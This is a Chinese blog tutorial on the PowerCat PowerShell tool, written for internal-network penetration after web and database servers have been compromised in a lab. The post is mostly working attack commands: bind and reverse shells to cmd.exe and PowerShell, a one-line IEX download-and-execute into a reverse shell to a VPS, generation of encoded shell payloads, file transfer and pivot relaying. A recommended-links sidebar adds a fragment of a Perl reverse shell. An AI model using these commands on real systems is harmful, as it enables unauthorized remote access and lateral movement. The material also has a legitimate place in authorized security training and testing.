PowerCat脚本使用

最新推荐文章于 2023-04-15 23:02:53 发布
最新推荐文章于 2023-04-15 23:02:53 发布
阅读量523 收藏 2
点赞数 2
分类专栏: 内网渗透 文章标签: powershell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zlirving_/article/details/114365498
版权

目录

PowerCat
Netcat: The powershell version. (Powershell Version 2 and Later Supported)
nc的powershell版本(支持powershell v2及以上)

github地址:https://github.com/besimorhino/powercat

导入PowerCat

进入powershell,且有git环境
git clone https://github.com/besimorhino/powercat.git
在这里插入图片描述
cd powercat
import-module .\powercat.ps1
若异常是权限所致,直接修改权限 set-executionpolicy remotesigned

具体策略有:
Unrestricted:允许所有的脚本执行
Restricted:脚本不能运行
RemoteSigned:本地创建的脚本可以执行,但是网上下载的不允许
AllSigned:脚本有受信任的发布者签名时才能执行
Bypass:绕过安全策略执行脚本

查看是否已经导入
powercat -h
在这里插入图片描述

主要命令:
-l      监听一个连接                       
-c      连接到一个监听
-p      指定端口
-e      指定一个程序执行
-ep     执行Powershell       
-v      显示详细信息     
-r      Relay. Format: "-r tcp:10.1.1.1:443"                 [String]
-u      Transfer data over UDP.                              [Switch]
-dns    Transfer data over dns (dnscat2).                    [String]
-dnsft  DNS Failure Threshold.                               [int32]
-t      Timeout option. Default: 60                          [int32]
-i      Input: Filepath (string), byte array, or string.     [object]
-o      Console Output Type: "Host", "Bytes", or "String"    [String]
-of     Output File Path.                                    [String]
-d      Disconnect after connecting.                         [Switch]
-rep    Repeater. Restart after disconnecting.               [Switch]
-g      Generate Payload.                                    [Switch]
-ge     Generate Encoded Payload.                            [Switch]
-h      打印出帮助
实验环境

Kali:192.168.101.129
WebServer:192.168.101.133 10.10.10.136
SqlServer:10.10.10.250
(这里的WebServer和SqlServer只是别名假设,主要是网段得分清楚)
在这里插入图片描述
已拿下web和数据库服务器,kali可访问web数据库,不能访问数据库服务器,web服务器可访问数据库服务器

1. 通过nc正向连接powercat

WebServer:
powercat -l -p [本地监听端口] -e cmd.exe -v
在这里插入图片描述
Kali:
netcat [webserverIP] [webserver监听端口] -vv
在这里插入图片描述

2. 通过nc反向连接powercat

Kali:
netcat -l -p [监听端口] -vv
在这里插入图片描述
WebServer:
powercat -c [vpsIP] -p [vps监听端口] -v -e cmd.exe
在这里插入图片描述
也可以远程下载并执行
powershell IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1');powercat -c [vpsIP] -p [vps监听端口] -e cmd
在这里插入图片描述

3. 通过powercat反弹powershell

现在让数据库server反向连接webserver
WebServer:
powercat -l -p [webserver监听端口] -v
在这里插入图片描述
SqlServer:
powercat -c [webIP] -p [webserver监听端口] -v -ep(用于返回powershell)
在这里插入图片描述

4. 通过powercat传输文件

webserver新建calc.bat文件,放置c盘根目录下
SqlServer接收
powercat -l -p [监听端口] -of 1.bat -v
在这里插入图片描述
WebServer:发送
powercat -c [webserverIP] -p [数据库监听端口] -i c:\calc.bat -v
在这里插入图片描述

5. 用powercat生成payload

用powercat生成payload也有正反向之分,且可进行编码。尝试生成简单payload反弹shell
WebServer:
powercat -l -p [本地监听端口] -e cmd -v -g >> shell.ps1
在这里插入图片描述
将生成的ps1文件上传到数据库server中执行 .\shell.ps1
powercat -c [数据库server] -p [本地监听端口] -v
如果想反弹powershell
powercat -l -p [本地监听端口] -ep -v -g >> shell.ps1
也可以直接生成经过编码的payload
powercat -l -p [本地监听端口] -e cmd -v -ge >> shell.ps1
在这里插入图片描述
可以直接使用powershell -e [编码]执行命令
但是编码后的payload太长,复制到命令窗口会报错…
在这里插入图片描述

6. powercat作为跳板

环境:webserver可ping数据库server和vps,vps不能访问数据库server
SqlServer:(监听)
powercat -l -v -p [本地监听端口] -e cmd.exe
在这里插入图片描述
WebServer:(连接)
powercat -l -v -p [vps监听端口] -r tcp:[sqlserverip:sqlserver监听端口]
在这里插入图片描述
vps:(监听)
nc [webserverIP] [本地监听端口] -vv
在这里插入图片描述
 
更多用法可阅读gayhub地址的文档
GOT IT!

 
******************************************************
具体利用方式需根据具体实践场景~

想冲大厂的癞蛤蟆
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网隧道代理技术(六)之 PowerCat反弹Shell
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
06-25 614
PowerCat是一个powershell写的tcp/ip瑞士军刀,看一看成ncatpowershell的实现,然后里面也加入了众多好用的功能,如文件上传,smb协议支持,中继模式,生成payload,端口扫描等等。
powercat.ps1
09-23
https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1
内网渗透----powercat工具使用
Armandhe的博客
06-21 227
powercat端口转发
Powercat DNS隧道的使用(附内网环境实现以及分享一些遇到的坑)
markecheng的博客
12-10 463
前言 上篇说到powercat 的基本使用,但是Powercat也是一种基于DNS协议的通信工具,powercar的DNS的通信就是基于DNScat设计的(服务端就是DNScat)我们的目的就是利用服务端的DNScat与目标机器中的powercat进行交互 网络环境: 使用机器: kali攻击机、windows 2008 R2以及windows7作为主要机器 实现目标: (1)kali使用Dnscat以及与windows 2008 产生交互 (2)以windows 2008 作为跳板机,基于TCP协议,k
Powershell工具Powercat(可以理解为免杀nc)
墨痕诉清风的博客
04-15 841
Powershell工具Powercat(可以理解为免杀nc)
PowerCat 介绍
f_carey的博客
10-17 841
郑重声明: 本笔记编写目的只用于安全知识提升,并与更多人共享安全知识,切勿使用笔记中的技术进行违法活动,利用笔记中的技术造成的后果与作者本人无关。倡导维护网络安全人人有责,共同维护网络文明和谐。 PowerCat 介绍1 PowerCat 基础2 实验环境3 利用 NC 正向连接 PowerCat4 利用 NC 反向连接 PowerCat5 利用 PowerCat 返回 PowerShell6 利用 PowerCat 生成 Payload6.1 正向 Payload6.2 反向 Payload7 利用.
工具之powercat使用教程
shy的博客
10-06 3134
下载 地址:https://github.com/besimorhino/powercat 运行 使用: 由于PowerCat是NetCatPowerShell形式,所以,PowerCat可以无缝的和Netcat连接。PowerCat的用法和Netcat几乎一模一样。 kali:192.168.206.128 win10:192.168.206.1 -eExecute. Specify the name of the process to start. 运行。开启运行一个程序 .
隐藏通信隧道技术(下)
LJH1999ZN的博客
04-08 4357
一、传输层隧道技术 1.Netcat获取shell(反向shell) 第一种:如果目标主机安装nc 在本地监听5555端口 在目标主机上输入一下payload Socket;$i="10.2.1.170";$p=5555;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(S.
内网工具powercat使用(附内网环境实现)
markecheng的博客
12-07 674
前言 Powercat功能也是非常的强大,同nc都是传输层的内网利用工具,PowerCat可以说是powershell版本的nc,PoweCat可以通过执行命令回到本地执行,也可以使用远程权限执行,这次我们实现 实验拓扑图如: 我们的主要目标过程是:使用kali攻击机、windows 2008 R2、以及windows 7 三台电脑来实现powerCat常用功能,以及natcat正反向连接powercat Kali安装powercat: git clone https://github.com/besim
【渗透测试笔记】之【内网渗透——传输层隧道(PowerCat使用:正反向shell、文件传输、dns隧道、生成powershell payload、内网转发)】
AA8j的博客
10-22 525
写在前面:PowerCatPowerShell版本的nc,主要用于windows平台。 1 实验环境 kali(攻击机,外网地址:192.168.8.48) Windows2012(边界服务器,外网地址:192.168.8.57,内网地址:10.1.1.10) CentOS7(边界服务器,外网地址:192.168.8.35,内网地址:10.1.1.13) DC(内网地址:10.1.1.2) 2 下载与部署 2.1 下载 下载地址:https://github.com/besimorhino/powerc
反弹 shell 常见方式详解(非常实用)
10-18
反弹 shell 常见方式详解(非常实用) [ 隧道技术 ] 反弹shell(一)nc反弹shell [ 隧道技术 ] 反弹shell(二)bash...[ 隧道技术 ] 反弹shell(三)powercat反弹shell [ 隧道技术 ] 反弹shell(四)python反弹shell
Molex综合布线产品在比赛场馆的应用
03-03
Molex综合布线产品是一套完整...Molex五类、超五类及六类布线系统性能超群,PowerCat6系统双绞线的绞和特性使得电缆上的信号传输带宽可以达到350MHZ;特级ScTP全屏蔽系统超越ISO 11801 DIN 44312-5性能七类标准600MHZ。
正向连接与反向连接1
08-08
1、在Kali上开启nc监听2、工具下载:https://github.com/besimorhino/powercat,然后powershell进入power
内网渗透之隐藏隧道技术
Zlirving_的博客
05-07 1715
  个人学习笔记及归纳总结,学习内网渗透的必备基础(干货)   隐藏隧道技术即是,绕过端口屏蔽的通信方式 判断内网连通性 imcp ping [ip] tcp nc -zv [ip] [port] http curl 支持文件上传和下载等。linux自带,windows须安装 curl [域名:端口] 设代理 curl -x [proxy-ip:port] [域名] dn...
利用ZeroLogon漏洞接管域控权限
Zlirving_的博客
02-25 1572
目录漏洞介绍实验环境实验开始进入域漏洞验证漏洞利用置空域控密码获取新凭据获取域控半交互式shell获取初始凭据(sam)还原域控密码 漏洞介绍 CVE-2020-14722 (又称ZeroLogon) 是一个windows域控中严重的远程权限提升漏洞。它是因为微软在Netlogon协议中没有正确使用加密算法而导致的漏洞。由于微软在进行AES加密运算过程中,使用了AES-CFB8模式并且错误的将IV设置为全零,这使得攻击者在明文(client challenge)、IV等要素可控的情况下,存在较高概率使得产生
利用mimikatz抓取密码及散列值
Zlirving_的博客
01-15 1451
目录windows系统散列值获取前提介绍在线读取散列值及明文密码离线读取lsass.dmp文件防范 windows系统散列值获取 域环境中,用户信息存储在ntds.dit,加密成散列值(都为散列加密算法) LM HASH:DES加密。明文密码限定在14为以内。不够字节用0补齐 NTLM HASH:MD4加密。 前提介绍 抓取密码之前,必须为最高权限。windows下用户名、散列值及其他安全信息都保存在SAM文件中。lsass.exe进程用于实现windows安全策略. 工具: Mimikatz Procd
frp内网穿透工具的使用
Zlirving_的博客
03-11 1325
目录frp工具介绍frp工具原理frp配置文件默认的frps.ini默认的frpc.inifrp下载安装与使用端口转发服务内网穿透服务 FRP官方文档 frp工具介绍 为什么需要内网穿透? 我们的物理机、服务器可能处于路由器后或者处于内网之中。如果我们想直接访问到内网设备的服务,一般来说要通过一些转发或者P2P(端到端)组网软件的帮助。 对于FRP穿透工具来说,它具有端口转发及以外的功能,端口转发是只会进行单个端口的流量转发,但是这在渗透中往往是不行的,FRP可以进行内网的全流量的数据代理。 frp介绍
ICMP隧道之PingTunnel利用
Zlirving_的博客
02-13 1162
目录ICMP隧道PingTunnel环境配置实验利用查看流量包总结 ICMP隧道 icmp隧道简单、实用,是一个比较特殊的协议。在一般的通信协议里,如果两台设备进行通信肯定需要开放端口,而在icmp协议中则不需要。最常见的icmp消息为ping命令的回复,攻击者可以利用命令行得到比回复更多的icmp请求。 利用价值,在利用 ping 穿透防火墙的检测,因为通常防火墙是不会屏蔽 ping 数据包的。 PingTunnel 用于通过ICMP回显请求和答复数据包(通常称为ping请求和答复)可靠地建立TCP连接的
端口转发之lcx与portmap结合利用
Zlirving_的博客
02-12 852
目录端口转发端口转发与端口映射的区别工具介绍lcxportmap实验利用总结 端口转发 端口转发(Port forwarding),有时被叫做隧道,是安全壳(SSH) 为网络安全通信使用的一种方法。 比如,我们现在在内网中,是没有办法直接访问外网的。但是我们可以通过路由器的NAT方式访问外网。假如我们内网现在有100台主机,那么我们现在都是通过路由器的这一个公网IP和外网通信的。那么,当互联网上的消息发送回来时,路由器是怎么知道这个消息是给他的,而另外消息是给你的呢?这就要我们的ip地址和路由器的端口进行绑
windows反弹shell方法
最新发布
09-21
攻击者可以在目标机器的cmd中执行命令,通过下载Powercat脚本使用它来建立反弹shell连接。具体的命令如下: ```powershell powershell IEX (New-Object System.Net.Webclient).DownloadString('...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值